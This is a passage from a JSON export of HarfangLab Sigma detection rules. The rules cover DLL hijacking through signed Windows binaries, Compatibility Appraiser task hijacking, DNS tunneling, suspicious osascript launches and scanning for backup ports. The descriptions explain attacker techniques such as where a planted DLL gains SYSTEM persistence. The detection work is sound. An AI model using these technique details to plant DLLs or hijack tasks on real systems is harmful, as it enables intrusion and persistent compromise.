'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e33f1e79-2e97-4b0b-a502-044f0da8a201",
"rule_name": "DLL Hijacking via dnscmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dnscmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e344342c-978e-4bf2-b1b3-d96d716b5363",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075012Z",
"creation_date": "2026-03-23T11:45:34.075015Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075020Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_process_persistence_telemetry_hijack.yml",
"content": "title: Microsoft Compatibility Appraiser Scheduled Task Hijacked Process\nid: e344342c-978e-4bf2-b1b3-d96d716b5363\ndescription: |\n Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (also known as Windows Telemetry) with a custom command.\n This task is typically set to run once a day and requires administrative privileges, as it involves creating a new registry entry in HKLM. The malicious command is executed as a child process of CompatTelRunner.exe, a legitimate process associated with the task.\n This rule identifies unauthorized modifications to the scheduled task, which is often used by adversaries to execute malicious payloads. The custom command can be indicative of malicious activities such as persistence, privilege escalation, or data exfiltration.\n It is recommended to investigate the source of the modification, analyze the command-line arguments of the custom command, review the process tree to identify any suspicious behavior, and reset the scheduled task to its default configuration.\nreferences:\n - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2020/09/29\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\compattelrunner.exe'\n\n exclusion_rundll:\n # rundll32 C:\\Windows\\system32\\generaltel.dll,RunInUserCxt WrMEazCLDEecukhj.1 Census\n # rundll32 C:\\Windows\\system32\\GeneralTel.dll,RunInUserCxt ZmmKYGDmyEaZ9VmQ.1.1.2 {DFF3552F-9DB5-46D6-B319-E936518CD395} 
{DA76D0E0-22C5-454B-97B6-406355D75C2F} IsAdmin WAMAccountCount\n # C:\\Windows\\system32\\rundll32.exe C:\\Windows\\system32\\GeneralTel.dll,RunGeneralTelemetry -cV ka/CLOtQeUyPdoUR.1.2 -SendFullTelemetry -ThrottleUtc -TelemetryAllowed -MarkersNotAllowed\n Image|endswith: '\\rundll32.exe'\n CommandLine:\n - '*generaltel.dll,RunInUserCxt *'\n - '*generaltel.dll,RunGeneralTelemetry *'\n # Signed: 'true'\n exclusion_dismhost:\n # C:\\Windows\\TEMP\\CCB5149E-DF4F-4D28-AE32-6F8E1FC5439B\\dismhost.exe {7E7BBF9D-E772-4D82-BAF9-E95D3CDCAD19}\n Image|endswith: 'DismHost.exe'\n # Signed: 'true'\n exclusion_powershell:\n # powershell.exe -ExecutionPolicy Restricted -Command \"$Res = 0; $VDisks = (Get-VirtualDisk | Where-Object ResiliencySettingName -eq Parity); if ($null -ne $VDisks) { $Res = 1 }; Write-Host 'Final result:',$Res;\"\n # powershell.exe C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -ExecutionPolicy Restricted -Command Write-Host \"Final result: 1\";\n Image|endswith: '\\powershell.exe'\n # Signed: 'true'\n CommandLine|contains: ' -ExecutionPolicy Restricted -Command '\n exclusion_conhost:\n # C:\\Windows\\System32\\conhost.exe\n Image|contains: 'Windows\\system32\\conhost.exe'\n # Signed: 'true'\n exclusion_compattelrunner:\n # C:\\Windows\\system32\\compattelrunner.exe -m:GeneralTel.dll -f:RunGeneralTelemetry -cV vCoyb+WnQE6Jl8PV.1.2 -SendFullTelemetry -ThrottleUtc\n Image:\n - '*\\system32\\compattelrunner.exe'\n # 'c:\\Windows\\winsxs\\amd64_microsoft-windows-a..xperience-inventory_31bf3856ad364e35_6.1.7601.24535_none_e8e44c62fea3e082\\CompatTelRunner.exe'\n - '?:\\Windows\\winsxs\\amd64_microsoft-windows*\\CompatTelRunner.exe'\n - '?:\\Windows\\winsxs\\x86_microsoft-windows-*\\CompatTelRunner.exe'\n # Signed: 'true'\n exclusion_werfault:\n # C:\\Windows\\system32\\WerFault.exe -u -p 7064 -s 480\n Image|endswith:\n - '\\system32\\WerFault.exe'\n - '\\syswow64\\WerFault.exe'\n # Signed: 'true'\n exclusion_devicecensus:\n # 
C:\\Windows\\system32\\devicecensus.exe\n Image|endswith: '\\system32\\devicecensus.exe'\n # Signed: 'true'\n exclusion_diagtrackrunner:\n Image|endswith: '\\windows\\system32\\compattel\\DiagTrackRunner.exe'\n exclusion_aitstatic:\n # Application Impact Telemetry Static Analyzer (by microsoft)\n Image|endswith: '\\Windows\\System32\\aitstatic.exe'\n exclusion_solidworks:\n Image:\n - '?:\\Program Files\\SOLIDWORKS Corp\\SOLIDWORKS PDM\\EdmServer.exe'\n # C:\\Program Files\\SOLIDWORKS 2018\\SOLIDWORKS PDM\\EdmServer.exe\n - '?:\\Program Files\\SOLIDWORKS 20??\\SOLIDWORKS PDM\\EdmServer.exe'\n exclusion_unknown_diag:\n # batch of those 3 commands\n CommandLine:\n - 'dxdiag /t ?:\\WINDOWS\\Temp\\InboxUtilityMP_{47ecb557-ef86-450e-a01d-d2cc01e6b7aa}_dxdiag.txt'\n - 'powercfg /list'\n - 'ipconfig /all'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e344342c-978e-4bf2-b1b3-d96d716b5363",
"rule_name": "Microsoft Compatibility Appraiser Scheduled Task Hijacked Process",
"rule_description": "Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (also known as Windows Telemetry) with a custom command.\nThis task is typically set to run once a day and requires administrative privileges, as it involves creating a new registry entry in HKLM. The malicious command is executed as a child process of CompatTelRunner.exe, a legitimate process associated with the task.\nThis rule identifies unauthorized modifications to the scheduled task, which is often used by adversaries to execute malicious payloads. The custom command can be indicative of malicious activities such as persistence, privilege escalation, or data exfiltration.\nIt is recommended to investigate the source of the modification, analyze the command-line arguments of the custom command, review the process tree to identify any suspicious behavior, and reset the scheduled task to its default configuration.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e35d4489-1f45-4352-8c90-aee45e3ae5b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603154Z",
"creation_date": "2026-03-23T11:45:34.603157Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603165Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1568/003/"
],
"name": "t1071_004_long_dns_request.yml",
"content": "title: Abnormally Long DNS Name Resolved (Windows)\nid: e35d4489-1f45-4352-8c90-aee45e3ae5b9\ndescription: |\n Detects an abnormally long DNS query, which is usually associated with DNS tunneling.\n Adversaries may use the DNS protocol to communicate with their C&C.\n It is recommended to check the content of the request and to look for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1568/003/\ndate: 2024/09/26\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n Image|contains: '?'\n QueryName|re: '[a-zA-Z0-9.-]{255}'\n\n filter_space:\n QueryName|re: ' {150}'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_svchost:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k HPZ12'\n\n exclusion_securitygateway:\n ProcessImage|endswith: '\\SecurityGateway\\App\\SecurityGateway.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MDaemon Technologies, Ltd.'\n QueryName|startswith: 'urldefense.com&key='\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e35d4489-1f45-4352-8c90-aee45e3ae5b9",
"rule_name": "Abnormally Long DNS Name Resolved (Windows)",
"rule_description": "Detects an abnormally long DNS query, which is usually associated with DNS tunneling.\nAdversaries may use the DNS protocol to communicate with their C&C.\nIt is recommended to check the content of the request and to look for suspicious behavior by the process making the request.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-09-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3743fcd-fe82-4998-8fa9-11fdc7145cf5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095580Z",
"creation_date": "2026-03-23T11:45:34.095582Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
"https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_osascript_suspicious_ancestors.yml",
"content": "title: Osascript Spawned from Suspicious Location\nid: e3743fcd-fe82-4998-8fa9-11fdc7145cf5\ndescription: |\n Detects osascript being executed from a suspicious location.\n Osascript is a command-line utility used to execute AppleScript scripts. AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format with the Native APIs NSAppleScript or OSAScript.\n An attacker could use AppleScript to execute other programs or scripts to achieve various behaviors, such as establishing a reverse shell or interacting with remote applications.\n It is recommended to investigate the program that spawned the script, the programs spawned by the script and the script itself to determine whether this action was legitimate.\nreferences:\n - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\n - https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2024/07/02\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Osascript\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/osascript'\n Ancestors|contains:\n - '/users/shared'\n - '/volumes'\n - '/private/tmp'\n\n exclusion_location_check:\n GrandparentCommandLine: '/Volumes/Player Location Check */Player Location Check.app/Contents/MacOS/Player Location Check'\n\n exclusion_installer:\n ParentImage|startswith:\n - '/private/tmp/PKInstallSandbox.*/Scripts/'\n - '/tmp/pkinstallsandbox.*/Scripts/'\n\n exclusion_legitimate_apps:\n ParentImage:\n - '/var/folders/*/clickshareclient/clickshare.app/Contents/MacOS/clickshare'\n - '/volumes/*/applications/zotero *.app/contents/macos/zotero'\n - '/volumes/cursor installer/cursor.app/contents/macos/cursor'\n - 
'/volumes/redisinsight/redisinsight.app/contents/macos/redisinsight'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3743fcd-fe82-4998-8fa9-11fdc7145cf5",
"rule_name": "Osascript Spawned from Suspicious Location",
"rule_description": "Detects osascript being executed from a suspicious location.\nOsascript is a command-line utility used to execute AppleScript scripts. AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format with the Native APIs NSAppleScript or OSAScript.\nAn attacker could use AppleScript to execute other programs or scripts to achieve various behaviors, such as establishing a reverse shell or interacting with remote applications.\nIt is recommended to investigate the program that spawned the script, the programs spawned by the script and the script itself to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-07-02",
"rule_modified_date": "2025-03-18",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3935968-27d9-4d1b-bb85-d234fbc3a6fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594227Z",
"creation_date": "2026-03-23T11:45:34.594230Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594238Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tskill.yml",
"content": "title: DLL Hijacking via tskill.exe\nid: e3935968-27d9-4d1b-bb85-d234fbc3a6fc\ndescription: |\n Detects potential Windows DLL Hijacking via tskill.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tskill.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3935968-27d9-4d1b-bb85-d234fbc3a6fc",
"rule_name": "DLL Hijacking via tskill.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tskill.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3b3b1d2-95c2-43b9-881d-10094e000cf5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088994Z",
"creation_date": "2026-03-23T11:45:34.088997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_002_persistence_dll_hijack_task_scheduler_wptsextensions.yml",
"content": "title: Task Scheduler Service DLL Hijack Detected\nid: e3b3b1d2-95c2-43b9-881d-10094e000cf5\ndescription: |\n Detects a method to achieve persistence by exploiting the Task Scheduler service without creating a new scheduled task.\n The Task Scheduler attempts to load a non-existent DLL named \"WptsExtensions.dll\" from the System32 directory.\n By creating a malicious DLL with the required exported functions and placing it in the System32 directory, an attacker can gain persistent execution with system privileges.\n It is recommended to analyze the loaded DLL for malicious contents and to investigate subsequent actions performed by the svchost.exe binary to look for malicious actions.\nreferences:\n - https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/09/28\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded: '*\\WptsExtensions.dll'\n Image|endswith: '\\svchost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3b3b1d2-95c2-43b9-881d-10094e000cf5",
"rule_name": "Task Scheduler Service DLL Hijack Detected",
"rule_description": "Detects a method to achieve persistence by exploiting the Task Scheduler service without creating a new scheduled task.\nThe Task Scheduler attempts to load a non-existent DLL named \"WptsExtensions.dll\" from the System32 directory.\nBy creating a malicious DLL with the required exported functions and placing it in the System32 directory, an attacker can gain persistent execution with system privileges.\nIt is recommended to analyze the loaded DLL for malicious contents and to investigate subsequent actions performed by the svchost.exe binary to look for malicious actions.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3ed3f5f-02d6-42e9-8592-cf2da12d32c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093843Z",
"creation_date": "2026-03-23T11:45:34.093846Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093850Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/RedDrip7/status/1545245625662418945",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hpscan.yml",
"content": "title: DLL Hijacking via HPScan\nid: e3ed3f5f-02d6-42e9-8592-cf2da12d32c0\ndescription: |\n Detects a potential Windows DLL search order hijacking via HPScan.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n HPScan tries to load version.dll without specifying its absolute path. By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/RedDrip7/status/1545245625662418945\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'HPScan.exe'\n ProcessSignature: 'HP Inc.'\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3ed3f5f-02d6-42e9-8592-cf2da12d32c0",
"rule_name": "DLL Hijacking via HPScan",
"rule_description": "Detects a potential Windows DLL search order hijacking via HPScan.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nHPScan tries to load version.dll without specifying its absolute path. By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e4357fbe-399f-4671-a1bf-732a2f71a38c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083335Z",
"creation_date": "2026-03-23T11:45:34.083337Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083341Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update",
"https://attack.mitre.org/techniques/T1595/",
"https://attack.mitre.org/techniques/T1046/"
],
"name": "t1046_softperfect_network_scanner_backup_systems.yml",
"content": "title: Suspicious Network Activity from SoftPerfect Network Scanner\nid: e4357fbe-399f-4671-a1bf-732a2f71a38c\ndescription: |\n Detects suspicious network activity initiated by the SoftPerfect Network Scanner to specific ports related to backup systems.\n This tool is frequently used by ransomware groups to identify backup systems for possible data exfiltration or encryption.\n It is recommended to investigate the parent process to look for malicious content or behavior.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update\n - https://attack.mitre.org/techniques/T1595/\n - https://attack.mitre.org/techniques/T1046/\ndate: 2024/02/20\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595\n - attack.discovery\n - attack.t1046\n - classification.Windows.Source.NetworkActivity\n - 